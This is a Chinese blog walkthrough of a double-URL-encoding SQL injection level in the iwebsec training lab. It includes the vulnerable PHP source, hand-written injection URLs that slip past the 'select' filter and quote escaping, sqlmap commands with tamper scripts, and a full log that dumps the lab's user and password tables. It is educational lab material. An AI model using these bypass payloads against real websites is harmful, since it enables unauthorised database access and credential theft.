iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过

原创 已于 2025-04-21 23:02:45 修改 · 4.5k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #web安全 #sql注入 #iwebsec #url二次编码绕过

于 2022-11-30 09:55:27 首次发布

系列文章目录

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记8- 大小写过滤注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记13-二次注入_iwebsec二次注入-CSDN博客

目录

系列文章目录

前言

一、源码分析

二、url二次编码

1.那么啥是二次编码呢?

2.本关卡如何利用二次编码使用select呢

3.遇到单引号如何处理

(1)爆数据库

(2)爆表名

(3)爆字段名

二、sqlmap注入

1.注入命令

方法1(url二次编码法):

方法2(十六进制编码法):

方法3(get_magic_quotes_gpc()未开启时):

2.完整交互

总结

前言

打开靶场,url为 http://192.168.71.151/sqli/10.php?id=1 如下所示

一、源码分析

如下所示,SQL语句与前几关一样,调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入,并且对参数id做了select关键字过滤,以及对id进行了url解码处理。

select关键字过滤与url解码的相关源码如下所示

  if(isset($_GET['id'])){
	if (preg_match('/select/', $_GET["id"])) {
		die("ERROR");
	}else{
		$id = urldecode($_GET['id']);	
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }

 为与第08关形成对比,下面时08关仅仅做select关键字处理的源码

 if(isset($_GET['id'])){
	if (preg_match('/select/', $_GET["id"])) {
		die("ERROR");
	}else{
		$id=$_GET['id'];	
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }

这里要强调一下,相对于第08关的select关键字过滤,这里只是多了一层url解码。而本关卡的名称为双重url解码,这是因为默认情况下传入参数已经被url解码一次,而源码中新增的$id = urldecode($_GET['id']);   语句则是第二次url解码。看起来源码是对输入的参数进行了二次解码,防止关键字被绕过过滤。

二、url二次编码

看了源码分析后,我们了解到程序对二次编码绕过做了防范。

1.那么啥是二次编码呢?

假如我们传入双重url编码的字符串,将绕过非法字符检测,然后经urldecode解码,带入数据库中执行,导致SQL注入漏洞存在。

高版本PHP缺省设置magicquotesgpc为打开,这样一切get,post,cookie中的’,’’,\,null都将被特殊处理为\’,\’’,\,\0,可以防范大多数字符串SQL注入。。

举个例子:
'(单引号) 进行url编码后为%27
%27再次进行url编码后为%2527

如果我们使用二次编码技术将单引号'编码为%25%27,当服务器收到参数双重编码%2527时,完整的处理流程为

双重编码%2527->第一次解码成为%27(因为%25URL解码就是%),然后经过magicquotesgpc过滤时不做处理(即单引号不会变为\')->二次解码%27->'(单引号),从而绕开了PHP缺省的过滤机制。

2.本关卡如何利用二次编码使用select呢

源码分析过程中,我们得知select关键字被过滤,那么我们可以将select进行二次url编码

由于原文是select完整关键字过滤,那么我们只需将select中的第三个字母l进行url编码

l的url编码为%6c

%6c的url编码为%25%36%63

那么select可以替换为se%25%36%63ect

于是将渗透爆破获取数据库的注入语句

http://192.168.71.151/sqli/10.php?id=1 and 1=2 union select 1,2,database()

中关键字select替换为se%25%36%63ect,

可以成功渗透注入语句变为

http://192.168.71.151/sqli/10.php?id=1 and 1=2 union se%25%36%63ect 1,2,database()

3.遇到单引号如何处理

当magicquotesgpc未打开时,无需考虑此场景,其实iwebsec 靶场漏洞库 就没有开启这个功能,也就是说单引号和双引号等特殊字符不会被特殊处理。在这个关卡中,没有

试想当magicquotesgpc打开时,单引号’,双引号’’,\,null都将被特殊处理为\’,\’’,\,\0,可以防范大多数字符串SQL注入。这种时候如何处理呢?这也是下一个关卡11关要考虑处理的内容。

下面开始手工注入(假设magicquotesgpc打开)

因为iwebsec的靶场环境并没有打开,故而需要修改docker中sqli/10.php的源码,手动添加此功能

(1)爆数据库

http://192.168.71.151/sqli/10.php?id=1 and 1=2 union se%25%36%63ect 1,2,database()

如上图获取得到数据库名为iwebsec

(2)爆表名

失败注入命令如下,因为将上一步爆出的数据库iwebsec加上了单引号,导致注入失败:

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'

渗透方法1:将'iwebsec'替换为database()

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

渗透方法2:将'iwebsec'替换为%2527iwebsec%2527

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema=%2527iwebsec%2527

这里iwebsec数据库有四个表格sqli,user,users,xss

(3)爆字段名

比如说想获取到users的字段名,那么注入命令如下

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

但是这种语句因为get_magic_quotes_gpc()和addshalshes()函数的处理会报错

绕过的方法是使用%2527users%2527代替users

 http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(column_name) from information_schema.columns where table_name=%2527users%2527

二、sqlmap注入

根据上文,总结出绕过渗透的方法:

(1)使用se%25%36%63ect代替select

(2)使用%2527代替单引号

1.注入命令

方法1(url二次编码法):

使用sqlmap的绕waf脚本--tamper chardoubleencode.py,将select、单引号等内容进行二次编码即可绕过,这个方法正好点题(双重url编码绕过)

sqlmap -u http://192.168.71.151/sqli/10.php?id=1  --current-db --dump --batch  --tamper chardoubleencode.py

方法2(十六进制编码法):

参考第11关卡,可以使用16进制字编码来绕过

sqlmap -u http://192.168.71.151/sqli/10.php?id=1  --current-db --dump --batch --tamper hex2char.py

方法3(get_magic_quotes_gpc()未开启时):

这里要强调一下, 由于iwebsec的靶场环境没有开启 get_magic_quotes_gpc(),这时候就无需考虑单引号等字符被转义,只需要考虑select关键字被过滤掉,所以当前没有更改代码的情况下,使用第08关和09关的方法也可以渗透成功

sqlmap -u http://192.168.71.151/sqli/10.php?id=1  --current-db --dump --batch  --tamper double_ljn09.py
sqlmap -u http://192.168.71.151/sqli/10.php?id=1  --current-db --dump --batch  --tamper randomcase.py

2.完整交互

这里为了将chardoubleencode.py的作用完整显示出来,附上-v 3的完整交互信息,根据结果可知所有的字符串均进行了url二次编码,如下所示

kali@kali:/usr/share/sqlmap/tamper$ sqlmap -u http://192.168.71.151/sqli/10.php?id=1  --current-db --dump --batch --tamper chardoubleencode.py -v 3
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[(]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                                                                                                  
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:36:13 /2022-11-25/

[02:36:13] [DEBUG] cleaning up configuration parameters
[02:36:13] [INFO] loading tamper module 'chardoubleencode'
[02:36:13] [DEBUG] setting the HTTP timeout
[02:36:13] [DEBUG] setting the HTTP User-Agent header
[02:36:13] [DEBUG] creating HTTP requests opener object
[02:36:13] [INFO] resuming back-end DBMS 'mysql' 
[02:36:13] [INFO] testing connection to the target URL
[02:36:13] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8669=8669) THEN 1 ELSE (SELECT 1609 UNION SELECT 1652) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 2671 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(2671=2671,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3194 FROM (SELECT(SLEEP(5)))NdTE)
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178716271,0x737763636a6d4b595172494d63426767587648716c634d4558445341545941656d62644f46726646,0x7162627171)-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[02:36:13] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:36:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[02:36:13] [INFO] fetching current database
[02:36:13] [DEBUG] resuming configuration option 'string' ('age')
[02:36:13] [DEBUG] performed 0 queries in 0.00 seconds
current database: 'iwebsec'
[02:36:13] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[02:36:13] [INFO] fetching current database
[02:36:13] [INFO] fetching tables for database: 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2554%2541%2542%254C%2545%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%2520%2549%254E%2520%2528%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%2529%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.07 seconds
[02:36:13] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2533%2537%2531%2536%2563%2536%2539%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[02:36:13] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2565%256D%2561%2569%256C%252C%2569%2564%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2573%2571%256C%2569%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.05 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[02:36:13] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[02:36:13] [INFO] fetching columns for table 'user' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2535%2537%2533%2536%2535%2537%2532%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'user' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2569%2564%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2560%2575%2573%2565%2572%2560%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.05 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[02:36:13] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[02:36:13] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2538%2537%2533%2537%2533%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2569%2564%252C%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2578%2573%2573%252D%252D%2520%252D
[02:36:13] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[02:36:13] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[02:36:13] [INFO] fetching columns for table 'users' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2535%2537%2533%2536%2535%2537%2532%2537%2533%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'users' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2572%256F%256C%2565%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2575%2573%2565%2572%2573%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.01 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[02:36:13] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[02:36:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[02:36:13] [WARNING] your sqlmap version is outdated

[*] ending @ 02:36:13 /2022-11-25/

总结

SQL注入主要分析几个内容

(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合

(2)注入类别是什么?这部分是普通的报错型注入

(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码

了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。

iwebsec靶场SQL注入-bool盲注
qq_56041380的博客
03-24 535
bool注入是盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 3139
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
iwebsec sql-双重url编码绕过
Enrich_Life的博客
11-09 856
双重url编码,即对于浏览器发送的数据进行了两次urlencode操作,如s做一次url编码是%73,再进行一次编码是%25%37%33。一般情况下数据经过WAF设备的时候只会做一次url解码,这样解码之后的数据一般不会匹配到规则,达到了bypass的效果。函数对数据又进行了一次解码,按照题目意思是需要 url 编码绕过 select ,然后假设后台有 waf ,但是 waf 一般只会解码一次,我们进行两次编码就可以执行 SQL。就没有开启这个功能,也就是说单引号和双引号等特殊字符不会被特殊处理。
URL编码次数差异分析:一次编码 vs 二次编码
ttyy1112的专栏
05-30 1012
URL编码次数差异分析表明:单次编码仅转义特殊字符,而二次编码会额外转义%符号为%25。测试显示字符串"中国&page=1"在二次编码后%26变为%2526。实际应用中,代理转发和嵌套参数需二次编码,普通API调用则只需单次编码。解码时需要对应次数的逆向操作,建议实现智能解码逻辑并设置最大解码深度。该差异对Web安全、API设计和系统集成至关重要,特别是在微服务架构中需特别注意不同服务层对编码的预期差异。
mysql利用双重url编码绕过防火墙
一个码农的笔记
10-17 2075
例子: http://www.gzidc.org/search/ post 的数据: keyword=a 如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符 如果用双重编码url替换注入语句那么,waf就不会拦截 下面我写了一个程序来讲普通的注入语句转换为双重url编码: import stri
URL编码绕过WAF
技术超强的网络安全平台
11-21 2567
URL编码绕过WAF 符号\进行url编码一次是%5c。 但攻击者怕这个会被认出来,所以用二次编码,把%本身编码成%25。再和后边拼成%255c。 如果URL解码器有缺陷,只不断重复“从前边开始解析”这个步骤,就会把这个先变回%5c,再变成/,出现循环解析。当然这是错误的。正确的只应该解一步变成%5c。 抵抗父级目录回溯攻击,绝对不能依赖字符过滤,你过滤不完的。必须用“鸭子编程法”,先不论如何构造完整路径,再检验是否在有权的操作目录下。 要正确进行URL解码,谨记使用PHP等语言提供的内部函数,切勿重复发
URI通过编码两次绕过参数验证
FL__CL的博客
03-04 842
通常,Web 应用中的 URL 解析涉及多个组件(如浏览器、Web 服务器、应用服务器),它们可能在。在第一层解码之前执行,而最终访问路径的解析在第二层解码之后发生,就可能导致绕过。,会导致安全检查无效。在 Spring Boot 或其他 Web 框架中,,导致安全检查与实际执行路径不一致。如果检查发生在第一步前,就可能绕过认证。假设有一个 Web 应用,它会拦截。,然后拦截请求,返回 "非法路径"。是一个常见的安全问题,主要与。某些 Web 应用可能会阻止。,所以最好的方法是: ✅。
sqli-labs靶场(1-20)通关手册
m0_58168821的博客
07-03 1072
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
webug4.0通关笔记---(第一天:布尔注入)
liver100day的博客
04-23 799
